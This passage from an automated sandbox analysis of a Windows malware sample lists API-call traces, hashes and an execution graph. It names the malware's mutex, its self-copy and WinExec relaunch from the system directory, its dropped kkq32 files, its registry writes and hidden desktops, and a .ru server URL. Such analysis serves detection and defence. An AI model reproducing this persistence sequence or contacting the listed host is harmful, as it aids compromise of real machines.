                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2711 403840 printf 2712 403880 2711->2712 2713 403884 printf 2712->2713 2714 40386d printf 2712->2714 2714->2712 2720 4052e0 2721 4052ec strcat strcat 2720->2721 2737 40431f 2721->2737 2724 405360 2725 40537c CreateProcessA 2724->2725 2726 405469 2725->2726 2727 4053ac CloseHandle sprintf 2725->2727 2728 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2726->2728 2729 405413 2727->2729 2730 4054d0 2728->2730 2731 4053e5 FindWindowA 2729->2731 2732 40541d 2729->2732 2731->2732 2733 405402 Sleep 2731->2733 2732->2726 2734 405421 Sleep 2732->2734 2733->2729 2735 405434 Sleep 2734->2735 2736 40543e GetWindowTextA 2734->2736 2735->2736 2736->2726 2738 404341 GetCurrentThreadId GetThreadDesktop 2737->2738 2739 404364 CreateDesktopA 2737->2739 2740 40438e SetThreadDesktop 2738->2740 2741 40435f memset 2738->2741 2739->2740 2739->2741 2740->2741 2741->2724 2741->2725 2844 401581 2845 4015c8 2844->2845 2846 4015a2 rand 2845->2846 2847 4015cc 2845->2847 2846->2845 2742 403562 GetModuleFileNameA 2743 403588 2742->2743 3004 402ba3 3007 402a89 3004->3007 3005 402cd2 3006 402cad GetCurrentProcessId 3006->3007 3007->3005 3007->3006 3008 402b2a GetModuleHandleA GetProcAddress 3007->3008 3008->3007 2744 4077e4 2745 407808 2744->2745 2752 40789e 2744->2752 2746 407820 SetFocus 2745->2746 2747 40782b 2745->2747 2745->2752 2746->2747 2748 407833 SetFocus 2747->2748 2749 40783e 2747->2749 2748->2749 2750 407857 2749->2750 2751 40784c SetFocus 2749->2751 2753 40786a 2750->2753 2754 40785f SetFocus 2750->2754 2751->2750 2757 407910 2752->2757 2758 4078fe CallWindowProcA 2752->2758 2755 407872 SetFocus 2753->2755 2756 40787d 2753->2756 2754->2753 2755->2756 2756->2752 2759 407885 SetFocus 2756->2759 2758->2757 2759->2752 2848 405c09 lstrlenA GetTickCount srand 2881 40509b 2848->2881 2853 405f54 2854 405caf ExpandEnvironmentStringsA 2895 40570c 2854->2895 2857 405ceb strcat strcat 2858 40431f 4 API calls 2857->2858 2859 405d14 memset 2858->2859 2860 405d72 CreateProcessA 2859->2860 2861 405d56 2859->2861 2862 405da2 CloseHandle sprintf 2860->2862 2863 405f24 DeleteFileA TerminateProcess CloseHandle 2860->2863 2861->2860 2864 405e09 2862->2864 2863->2853 2865 405e13 2864->2865 2866 405ddb FindWindowA 2864->2866 2865->2863 2868 405e1b Sleep GetWindowTextA 2865->2868 2866->2865 2867 405df8 Sleep 2866->2867 2867->2864 2869 405e50 2868->2869 2869->2863 2934 405613 2869->2934 2871 405e6b 2871->2863 2872 405e76 CopyFileA 2871->2872 2873 403619 5 API calls 2872->2873 2874 405e9c DeleteFileA lstrlenA strncmp 2873->2874 2875 405ec6 lstrlenA 2874->2875 2876 405eef 2874->2876 2942 403743 CreateFileA 2875->2942 2878 403743 4 API calls 2876->2878 2879 405eea LocalFree 2878->2879 2879->2863 2882 4050ea 2881->2882 2883 4050b6 sprintf 2882->2883 2884 4050f8 2882->2884 2945 4041f4 2883->2945 2885 4041f4 4 API calls 2884->2885 2887 40510e 2885->2887 2948 4041c3 lstrlenA 2887->2948 2890 40429c RegOpenKeyExA 2891 4042e0 RegQueryValueExA 2890->2891 2892 4042dc 2890->2892 2893 404304 RegCloseKey 2891->2893 2894 4042f8 RegCloseKey 2891->2894 2892->2853 2892->2854 2893->2892 2894->2892 2896 4079e4 2895->2896 2897 405719 GetTempPathA 2896->2897 2898 405746 2897->2898 2898->2898 2956 4015ea 2898->2956 2901 405798 strcat 2902 4057ac rand 2901->2902 2903 4057e7 rand 2902->2903 2904 4057be rand sprintf 2902->2904 2905 4057f9 strcat 2903->2905 2906 40580d strcat rand 2903->2906 2904->2903 2905->2906 2907 405839 strcat 2906->2907 2908 40584d rand 2906->2908 2907->2908 2909 405888 sprintf rand 2908->2909 2910 40585f rand sprintf 2908->2910 2911 4058c3 strcat 2909->2911 2912 4058d7 strcat rand 2909->2912 2910->2909 2911->2912 2913 405911 strcat rand 2912->2913 2914 4058fd strcat 2912->2914 2915 405966 strcat rand 2913->2915 2916 40593d rand sprintf 2913->2916 2914->2913 2917 4059a0 strcat rand 2915->2917 2918 40598c strcat 2915->2918 2916->2915 2919 4059d2 strcat 2917->2919 2920 4059e6 strcat rand 2917->2920 2918->2917 2919->2920 2921 405a20 sprintf rand 2920->2921 2922 405a0c strcat 2920->2922 2923 405a70 strcat rand 2921->2923 2924 405a5c strcat 2921->2924 2922->2921 2925 405ab0 rand sprintf rand 2923->2925 2926 405a9c strcat 2923->2926 2924->2923 2927 405af3 strcat 2925->2927 2928 405b07 strcat rand 2925->2928 2926->2925 2927->2928 2929 405b39 strcat 2928->2929 2930 405b4d rand 2928->2930 2929->2930 2931 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2930->2931 2932 405b5f rand sprintf 2930->2932 2933 405c04 2931->2933 2932->2931 2933->2853 2933->2857 2935 4079e4 2934->2935 2936 405620 FindFirstUrlCacheEntryA 2935->2936 2937 405663 _stricmp 2936->2937 2940 405685 2936->2940 2938 4056a7 FindNextUrlCacheEntryA 2937->2938 2937->2940 2939 4056c9 _stricmp 2938->2939 2938->2940 2939->2940 2941 4056fb 2939->2941 2940->2871 2941->2938 2943 403775 2942->2943 2944 403779 SetFilePointer WriteFile CloseHandle 2942->2944 2943->2879 2944->2943 2951 40421f RegCreateKeyExA 2945->2951 2949 40421f 4 API calls 2948->2949 2950 4041ee InterlockedIncrement memset 2949->2950 2950->2890 2952 404262 RegSetValueExA 2951->2952 2953 404219 2951->2953 2954 404288 RegCloseKey 2952->2954 2955 40427c RegCloseKey 2952->2955 2953->2882 2954->2953 2955->2953 2957 401634 2956->2957 2958 401638 strcat sprintf rand 2957->2958 2959 40160e rand 2957->2959 2958->2901 2958->2902 2959->2957 3009 4037aa 3010 4037c8 printf printf 3009->3010 3012 40380d 3010->3012 3013 4037fa printf 3012->3013 3015 403812 printf 3012->3015 3013->3012 3016 4035ab 3017 4079e4 3016->3017 3018 4035b8 vsprintf 3017->3018 3021 4035f9 MessageBoxA 3018->3021 3020 4035ea 3021->3020 2760 40686c lstrlenA 2761 405f5b 9 API calls 2760->2761 2762 40689a 2761->2762 2763 4068a1 WinExec 2762->2763 2764 4068a9 2762->2764 2763->2764 2960 40328f 2970 402efd 2960->2970 2961 402cd7 3 API calls 2961->2970 2962 4033ce 2963 40289a 4 API calls 2963->2970 2964 4030e5 GetModuleHandleA 2964->2970 2965 40314c VirtualQuery 2966 4031b1 IsBadWritePtr 2965->2966 2965->2970 2966->2970 2967 402f98 GlobalMemoryStatus 2967->2970 2968 402f6f IsBadReadPtr 2968->2970 2969 403059 CloseHandle 2969->2970 2970->2961 2970->2962 2970->2963 2970->2964 2970->2965 2970->2967 2970->2968 2970->2969 2971 407892 2972 40789e 2971->2972 2973 407910 2972->2973 2974 4078fe CallWindowProcA 2972->2974 2974->2973 3022 405133 10 API calls 3023 40429c 4 API calls 3022->3023 3024 405264 3023->3024 3025 405278 3024->3025 3026 40526b LocalFree 3024->3026 3028 40509b 6 API calls 3025->3028 3027 4054d0 3026->3027 3029 40527d ExpandEnvironmentStringsA 3028->3029 3048 404532 3029->3048 3032 4052d3 LocalFree 3032->3027 3033 4052ec strcat strcat 3034 40431f 4 API calls 3033->3034 3035 405315 memset 3034->3035 3036 405360 3035->3036 3037 40537c CreateProcessA 3035->3037 3036->3037 3038 4053ac CloseHandle sprintf 3037->3038 3047 405469 3037->3047 3040 405413 3038->3040 3039 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3039->3027 3041 4053e5 FindWindowA 3040->3041 3042 40541d 3040->3042 3041->3042 3043 405402 Sleep 3041->3043 3044 405421 Sleep 3042->3044 3042->3047 3043->3040 3045 405434 Sleep 3044->3045 3046 40543e GetWindowTextA 3044->3046 3045->3046 3046->3047 3047->3039 3049 40453f 3048->3049 3050 403619 5 API calls 3049->3050 3051 404570 3050->3051 3052 404579 3051->3052 3053 404596 lstrlenA LocalAlloc GetTempPathA 3051->3053 3054 404589 LocalFree 3051->3054 3052->3032 3052->3033 3055 404604 3053->3055 3054->3052 3055->3055 3056 4015ea rand 3055->3056 3057 40461d strcat sprintf rand 3056->3057 3058 404655 strcat 3057->3058 3059 404668 rand 3057->3059 3058->3059 3060 40467a rand sprintf 3059->3060 3061 40469d rand 3059->3061 3060->3061 3062 4046bb strcat 3061->3062 3063 4046ce strcat rand 3061->3063 3062->3063 3064 4046f3 strcat 3063->3064 3065 404706 rand 3063->3065 3064->3065 3066 404741 sprintf rand 3065->3066 3067 40471e rand sprintf 3065->3067 3068 404770 strcat 3066->3068 3069 404783 strcat rand 3066->3069 3067->3066 3068->3069 3070 4047a8 strcat 3069->3070 3071 4047bb strcat rand 3069->3071 3070->3071 3072 4047e6 rand sprintf 3071->3072 3073 404809 rand sprintf sprintf rand 3071->3073 3072->3073 3074 404859 rand sprintf 3073->3074 3075 40487c rand 3073->3075 3074->3075 3076 404894 strcat 3075->3076 3077 4048a7 rand 3075->3077 3076->3077 3078 4048b9 strcat 3077->3078 3079 4048cc rand 3077->3079 3078->3079 3080 4048f1 sprintf rand 3079->3080 3081 4048de strcat 3079->3081 3082 404926 strcat 3080->3082 3083 404939 rand 3080->3083 3081->3080 3082->3083 3084 40494b strcat 3083->3084 3085 40495e rand 3083->3085 3084->3085 3086 404976 rand sprintf 3085->3086 3087 404999 3085->3087 3086->3087 3090 4049a3 3087->3090 3114 404b12 3087->3114 3088 4043bf 2 API calls 3088->3114 3089 404b07 3091 404c87 strcat rand 3089->3091 3090->3089 3094 404a4b sprintf rand 3090->3094 3095 4049d9 sprintf 3090->3095 3092 404cac strcat 3091->3092 3093 404cbf rand 3091->3093 3092->3093 3096 404cd1 strcat 3093->3096 3097 404ce4 rand 3093->3097 3098 404a82 strcat 3094->3098 3099 404a95 rand 3094->3099 3095->3090 3096->3097 3101 404cf6 strcat 3097->3101 3102 404d09 strcat rand 3097->3102 3098->3099 3103 404aa7 strcat 3099->3103 3104 404aba rand 3099->3104 3100 404b47 sprintf 3100->3114 3101->3102 3105 404d34 rand sprintf 3102->3105 3106 404d57 rand 3102->3106 3103->3104 3104->3090 3107 404acc strcat 3104->3107 3105->3106 3108 404d69 strcat 3106->3108 3109 404d7c rand 3106->3109 3107->3090 3108->3109 3110 404da1 rand 3109->3110 3111 404d8e strcat 3109->3111 3112 404db9 strcat 3110->3112 3113 404dcc rand 3110->3113 3111->3110 3112->3113 3115 404e01 strcat rand 3113->3115 3116 404dde rand sprintf 3113->3116 3114->3088 3114->3091 3114->3100 3141 40447a lstrlenA LocalAlloc 3114->3141 3118 404e2c strcat 3115->3118 3119 404e3f strcat rand 3115->3119 3116->3115 3118->3119 3121 404e64 strcat 3119->3121 3122 404e77 strcat rand 3119->3122 3121->3122 3125 404ea2 strcat 3122->3125 3126 404eb5 sprintf rand 3122->3126 3123 404c02 rand 3127 404c14 strcat 3123->3127 3128 404c27 rand 3123->3128 3124 404bef strcat 3124->3123 3125->3126 3129 404ee3 strcat 3126->3129 3130 404ef6 strcat rand 3126->3130 3127->3128 3131 404c39 strcat 3128->3131 3132 404c4c LocalFree 3128->3132 3129->3130 3133 404f27 strcat 3130->3133 3134 404f3a rand sprintf rand 3130->3134 3131->3132 3132->3114 3133->3134 3135 404f77 strcat 3134->3135 3136 404f8a strcat rand 3134->3136 3135->3136 3137 404fb5 strcat 3136->3137 3138 404fc8 rand 3136->3138 3137->3138 3139 404fda rand sprintf 3138->3139 3140 404ffd 7 API calls 3138->3140 3139->3140 3140->3052 3142 4044b6 3141->3142 3143 4044d9 sprintf 3142->3143 3144 40452a sprintf rand 3142->3144 3143->3142 3144->3123 3144->3124 3145 401b33 3148 401aa4 3145->3148 3146 401b13 3147 401ae6 sprintf 3150 40129c 3147->3150 3148->3146 3148->3147 3151 4012a9 CreateFileA 3150->3151 3152 4079e4 3150->3152 3153 4012db ReadFile CloseHandle 3151->3153 3154 4012d7 3151->3154 3152->3151 3153->3154 3154->3146 3155 4036b3 CreateFileA 3156 4036e7 SetFilePointer 3155->3156 3157 4036e3 3155->3157 3158 403701 3156->3158 3158->3158 3159 403708 WriteFile WriteFile CloseHandle 3158->3159 3159->3157 2765 406ff6 2766 4071a4 2765->2766 2767 40701f 2765->2767 2770 40717e 2766->2770 2771 4071be DestroyWindow 2766->2771 2768 407021 2767->2768 2769 40702f 2767->2769 2772 407184 2768->2772 2773 40702a 2768->2773 2774 407289 GetWindowTextA 2769->2774 2775 40703a 2769->2775 2771->2770 2772->2770 2781 407198 PostQuitMessage 2772->2781 2776 4077cc DefWindowProcA 2773->2776 2779 4072c9 GetWindowTextA 2774->2779 2780 4072a9 MessageBoxA SetFocus 2774->2780 2777 407041 2775->2777 2778 40705c 2775->2778 2776->2770 2777->2773 2777->2776 2785 4071cb 2777->2785 2784 407149 2778->2784 2821 405ffa 2778->2821 2782 407322 2779->2782 2783 407302 MessageBoxA SetFocus 2779->2783 2780->2770 2781->2770 2789 407337 MessageBoxA SetFocus 2782->2789 2798 407357 2782->2798 2783->2770 2784->2770 2828 406075 2784->2828 2785->2770 2791 407224 SetTextColor 2785->2791 2793 407233 SetTextColor 2785->2793 2789->2770 2790 405ffa 3 API calls 2792 40709b GetWindowRect 2790->2792 2794 40723d SetBkColor CreateBrushIndirect 2791->2794 2792->2784 2795 4070be GetWindowRect 2792->2795 2793->2794 2794->2770 2795->2784 2797 4070d4 2795->2797 2796 4073a7 sprintf GetWindowTextA 2800 40740f sprintf GetWindowTextA 2796->2800 2801 4073ef MessageBoxA SetFocus 2796->2801 2797->2784 2802 407112 MoveWindow 2797->2802 2798->2796 2799 407376 MessageBoxA SetFocus 2798->2799 2799->2770 2803 407477 sprintf GetWindowTextA 2800->2803 2804 407457 MessageBoxA SetFocus 2800->2804 2801->2770 2802->2784 2805 4074d9 2803->2805 2806 4074b9 MessageBoxA SetFocus 2803->2806 2804->2770 2807 4074ee MessageBoxA SetFocus 2805->2807 2809 40750e 2805->2809 2806->2770 2807->2770 2808 40755e sprintf GetWindowTextA 2811 4075a6 MessageBoxA SetFocus 2808->2811 2812 4075c6 2808->2812 2809->2808 2810 40752d MessageBoxA SetFocus 2809->2810 2810->2770 2811->2770 2813 407627 sprintf CreateFileA SetFilePointer 2812->2813 2815 4075e5 MessageBoxA SetFocus 2812->2815 2814 40768e 2813->2814 2814->2814 2816 407695 WriteFile WriteFile 2814->2816 2815->2770 2817 4076db 2816->2817 2817->2817 2818 4076e2 6 API calls 2817->2818 2819 40776e 2818->2819 2819->2819 2820 407775 WriteFile WriteFile CloseHandle ShowWindow 2819->2820 2820->2770 2822 4079e4 2821->2822 2823 406007 GetWindow 2822->2823 2824 406020 2823->2824 2825 406024 2824->2825 2826 406028 GetClassNameA 2824->2826 2827 40605f GetWindow 2824->2827 2825->2790 2826->2824 2827->2824 2829 405ffa 3 API calls 2828->2829 2830 406096 2829->2830 2831 405ffa 3 API calls 2830->2831 2832 4060a3 10 API calls 2831->2832 2833 406224 SendMessageA 2832->2833 2834 40623a SendMessageA 2832->2834 2835 40624e CreateWindowExA CreateWindowExA 2833->2835 2834->2835 2836 406333 2835->2836 2837 4062cb sprintf SendMessageA sprintf SendMessageA 2836->2837 2838 40633c 34 API calls 2836->2838 2837->2836 2838->2770 2975 401219 2976 40121f __GetMainArgs 2975->2976 2977 407980 173 API calls 2976->2977 2978 401284 exit 2977->2978 2979 40109a 2987 40109b 2979->2987 2980 40117f 2981 40118e signal 2980->2981 2982 4011a8 signal 2981->2982 2983 4011c9 2981->2983 2982->2983 2984 40117b 2982->2984 2983->2984 2985 4011ce signal raise 2983->2985 2985->2984 2987->2980 2987->2981 2987->2984 2988 40107a RtlUnwind 2987->2988 2988->2987 2839 40237b 2840 402333 _sleep 2839->2840 2841 402355 2839->2841 2842 401b9f 23 API calls 2840->2842 2843 40234c 2842->2843 2843->2840 2843->2841 2989 40109b 2990 40117f 2989->2990 2997 4010c3 2989->2997 2991 40118e signal 2990->2991 2992 4011a8 signal 2991->2992 2993 4011c9 2991->2993 2992->2993 2994 40117b 2992->2994 2993->2994 2995 4011ce signal raise 2993->2995 2995->2994 2997->2991 2997->2994 2998 40107a RtlUnwind 2997->2998 2998->2997 2999 40129b 3000 4079e4 2999->3000 3001 4012a9 CreateFileA 3000->3001 3002 4012db ReadFile CloseHandle 3001->3002 3003 4012d7 3001->3003 3002->3003 2715 40365e 2716 403664 GetFileSize LocalAlloc 2715->2716 2717 403684 ReadFile CloseHandle 2716->2717 2719 4036ae 2717->2719 2534 40121f __GetMainArgs 2537 407980 GetCommandLineA 2534->2537 2538 407991 strchr 2537->2538 2539 4079a6 2537->2539 2538->2539 2540 4079cf GetModuleHandleA 2538->2540 2539->2540 2543 406c29 OpenMutexA 2540->2543 2544 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2543->2544 2545 406c5f CloseHandle exit 2543->2545 2546 406cd6 2544->2546 2545->2544 2547 406ce4 rand 2546->2547 2548 406e07 9 API calls 2546->2548 2550 406d5f 2547->2550 2590 402e06 2548->2590 2552 406d69 rand 2550->2552 2553 406d2f rand 2550->2553 2556 406d8a sprintf CopyFileA 2552->2556 2557 406d7c 2552->2557 2553->2550 2554 406f65 2606 4023a7 CreateThread CloseHandle 2554->2606 2555 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2555->2554 2567 403ce9 rand 2556->2567 2557->2556 2561 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2563 406fdc GetMessageA 2561->2563 2658 4068b0 2561->2658 2676 40682b 2561->2676 2565 406fc4 TranslateMessage DispatchMessageA 2563->2565 2566 401284 exit 2563->2566 2565->2563 2568 403d2e 2567->2568 2569 403d27 2567->2569 2607 403619 CreateFileA 2568->2607 2578 403f68 rand 2569->2578 2572 403d47 memcpy memset 2574 403da1 rand rand rand rand memcpy 2572->2574 2575 403e64 2574->2575 2613 403bbe 2575->2613 2579 404002 2578->2579 2580 403fd4 rand 2579->2580 2581 404009 rand 2579->2581 2580->2579 2582 40402a 6 API calls 2581->2582 2583 40401c 2581->2583 2618 404148 RegCreateKeyExA 2582->2618 2583->2582 2585 4040f5 2586 404148 3 API calls 2585->2586 2587 404125 2586->2587 2588 404148 3 API calls 2587->2588 2589 40413a WinExec ExitProcess 2588->2589 2591 402e13 2590->2591 2621 402822 6 API calls 2591->2621 2593 402e1b GetVersion 2594 402e2e 2593->2594 2595 402e79 LoadLibraryA GetProcAddress 2594->2595 2605 402ef6 2594->2605 2595->2594 2596 4033ce GetVersion 2596->2554 2596->2555 2598 4030e5 GetModuleHandleA 2598->2605 2599 40314c VirtualQuery 2600 4031b1 IsBadWritePtr 2599->2600 2599->2605 2600->2605 2601 402f98 GlobalMemoryStatus 2601->2605 2602 402f6f IsBadReadPtr 2602->2605 2604 403059 CloseHandle 2604->2605 2605->2596 2605->2598 2605->2599 2605->2601 2605->2602 2605->2604 2622 40289a 2605->2622 2626 402cd7 2605->2626 2606->2561 2635 4022ee 2606->2635 2608 403664 GetFileSize LocalAlloc 2607->2608 2610 40364e 2607->2610 2609 403684 ReadFile CloseHandle 2608->2609 2612 4036ae 2609->2612 2610->2608 2610->2612 2612->2569 2612->2572 2614 403bfd 2613->2614 2615 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2614->2615 2616 403c20 rand 2614->2616 2617 403c80 memset memcpy memcpy 2614->2617 2615->2569 2616->2614 2617->2614 2619 404193 2618->2619 2619->2619 2620 40419a RegSetValueExA RegCloseKey 2619->2620 2620->2585 2621->2593 2623 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2622->2623 2625 4029cd 2623->2625 2625->2605 2627 402ceb 2626->2627 2629 402d13 2627->2629 2630 402a72 2627->2630 2629->2605 2633 402a89 2630->2633 2631 402cd2 2631->2629 2632 402b2a GetModuleHandleA GetProcAddress 2632->2633 2633->2631 2633->2632 2634 402cad GetCurrentProcessId 2633->2634 2634->2633 2636 402333 _sleep 2635->2636 2640 401b9f 2636->2640 2656 4079e4 2640->2656 2657 4079e5 2656->2657 2657->2657 2660 4068c7 2658->2660 2661 406c0c _sleep 2660->2661 2662 403619 5 API calls 2660->2662 2664 406c01 LocalFree 2660->2664 2665 406941 sscanf 2660->2665 2667 406a84 atoi 2660->2667 2668 4069a4 sprintf sprintf 2660->2668 2669 4069db GetWindowsDirectoryA sprintf strcat 2660->2669 2672 406add lstrlenA 2660->2672 2673 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2660->2673 2674 406b9b lstrlenA 2660->2674 2675 406bbe CreateThread CloseHandle 2660->2675 2680 405f5b lstrlenA lstrlenA LocalAlloc 2660->2680 2685 4043bf 2660->2685 2661->2660 2662->2660 2664->2661 2665->2660 2666 406972 rand 2665->2666 2666->2660 2667->2660 2671 406aad sprintf 2667->2671 2670 406a27 DeleteFileA sprintf WinExec 2668->2670 2669->2670 2670->2660 2671->2660 2672->2660 2673->2660 2674->2660 2675->2660 2677 40683b 2676->2677 2693 406753 CreateFileA 2677->2693 2691 407a04 2680->2691 2682 405f9b lstrlenA 2692 407a04 2682->2692 2684 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2684->2660 2686 4043dc 2685->2686 2687 4043e2 memcpy 2686->2687 2689 40441a 2686->2689 2690 40442f 2687->2690 2688 404441 lstrlenA 2688->2690 2689->2688 2689->2690 2690->2660 2691->2682 2692->2684 2694 40678f GetFileSize CloseHandle 2693->2694 2700 40681a _sleep 2693->2700 2701 4013cc RegOpenKeyExA 2694->2701 2700->2677 2702 4013fa 2701->2702 2703 4013fe RegQueryValueExA RegCloseKey 2701->2703 2702->2700 2704 4054d7 6 API calls 2702->2704 2703->2702 2705 405586 2704->2705 2706 4055ce CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2705->2706 2707 40560e 2706->2707 2707->2700 2708 401348 RegCreateKeyExA 2707->2708 2709 40138a RegSetValueExA RegCloseKey 2708->2709 2710 401386 2708->2710 2709->2710 2710->2700

                            Executed Functions

                            Function 00406C29 Relevance: 82.5, APIs: 36, Strings: 11, Instructions: 264windowthreadregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
